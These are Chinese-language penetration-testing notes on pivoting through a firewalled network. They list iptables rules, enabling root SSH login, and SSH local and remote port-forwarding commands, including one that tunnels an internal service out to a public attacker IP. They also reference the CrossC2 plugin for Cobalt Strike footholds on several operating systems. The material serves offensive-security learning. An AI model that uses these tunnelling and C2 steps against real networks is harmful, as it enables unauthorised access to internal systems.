上线是指后续的渗透,通讯只能进行上网,不能做其他事
dns区域传输是tcp协议,域名解析用udp协议,也就是说防火我禁止所有的tcp的时候,还是能通过nslookup进行传输
ns记录是专门域名解析的设置
icmp是出站
ssh隧道&通讯
由于cs没有ssh协议监听,没办法上线,由于ssh协议存在于linux系统,所以跳板机必须是linux
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */
开启ssh协议登录,最后输入的密码是指攻击机的密码
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
本地:出站封----使用正向连接,将1.15的8080端口放到1.166的1122端口,然后攻击机连接跳板机,就直接能访问内网
跳板机:ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
攻击机:curl http://127.0.0.1:1122
远程:入站封----使用发向连接,将1.15的8080端口直接映射到攻击机的1234端口,攻击机直接访问
ssh -CfNg -R 1234:192.168.1.15:8080 root@47.94.236.117
curl http://127.0.0.1:1234
控制上线-插件-Linux&Mac&IOS&Android
https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
1、插件使用
2、命令使用
使用参考:https://gloxec.github.io/CrossC2/zh_cn/
通过插件,可以直接用cs进行各类操作系统的内网渗透